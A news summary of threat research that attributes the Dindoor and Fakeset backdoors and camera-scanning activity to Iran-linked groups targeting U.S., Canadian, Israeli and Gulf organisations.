The backdoor has a name: Dindoor. It runs on the Deno JavaScript runtime, it was previously unknown, and researchers now say it is the payload being dropped inside the networks of a U.S. bank, a Canadian non-profit, and the Israeli arm of a software company that supplies the defense and aerospace industries.
Research from Broadcom‘s Symantec and Carbon Black Threat Hunter Team has attributed the campaign to MuddyWater, also tracked as Seedworm — a state-sponsored group affiliated with Iran’s Ministry of Intelligence and Security. According to the report, the activity began in early February, with recent intrusions detected following U.S. and Israeli military strikes on Iran.
The Israeli operation of the software company appears to be the specific target. Researchers also found an attempt to exfiltrate data from that same company using the Rclone utility, with files directed toward a Wasabi cloud storage bucket. Whether the exfiltration succeeded is not currently known.
Two Backdoors, One Certificate
A second malware strain was active elsewhere. A Python backdoor called Fakeset turned up on the networks of a U.S. airport and a non-profit, downloaded from servers belonging to Backblaze, an American cloud storage provider. The digital certificate used to sign Fakeset is the same one previously used to sign two other tools — Stagecomp and Darkcomp — both linked to MuddyWater in prior investigations.
“While this malware wasn’t seen on the targeted networks, the use of the same certificates suggests the same actor — namely Seedworm — was behind the activity on the networks of the U.S. companies,” Symantec and Carbon Black said.
The researchers also noted a broader pattern: “Iranian threat actors have become increasingly proficient in recent years. Not only has their tooling and malware improved, but they’ve also demonstrated strong social engineering capabilities, including spear-phishing campaigns and ‘honeytrap’ operations.”
More Read
Camera Scanning as Pre-Strike Intelligence
Separate findings from Check Point connect a different thread. The pro-Palestinian hacktivist group Handala Hack, also known as Void Manticore, has been routing operations through Starlink IP ranges to probe externally facing applications. Meanwhile, Iran-linked group Agrius has been scanning for vulnerable Hikvision and Dahua cameras using five documented vulnerabilities: CVE-2017-7921, CVE-2023-6895, CVE-2021-36260, CVE-2025-34067, and CVE-2021-33044.
The exploitation attempts have surged across Israel, the U.A.E., Qatar, Bahrain, Kuwait, Lebanon, and Cyprus. Check Point’s assessment is pointed: the camera-targeting activity may function as pre-launch reconnaissance. “Tracking camera-targeting activity from specific, attributed infrastructures may serve as an early indicator of potential follow-on kinetic activity,” the company said, describing the behavior as consistent with Iran’s use of camera compromise for missile battle damage assessment.
Canada’s Centre for Cyber Security has since issued an advisory warning that Iran will likely direct its cyber capabilities toward retaliatory attacks on critical infrastructure. UltraViolet Cyber described the strategic picture plainly: “Iran’s offensive cyber capability has matured into a durable instrument of state power used to support intelligence collection, regional influence, and strategic signaling during periods of geopolitical tension.”
Photo by Tima Miroshnichenko on Pexels
This article is a curated summary based on third-party sources. Source: Read the original article
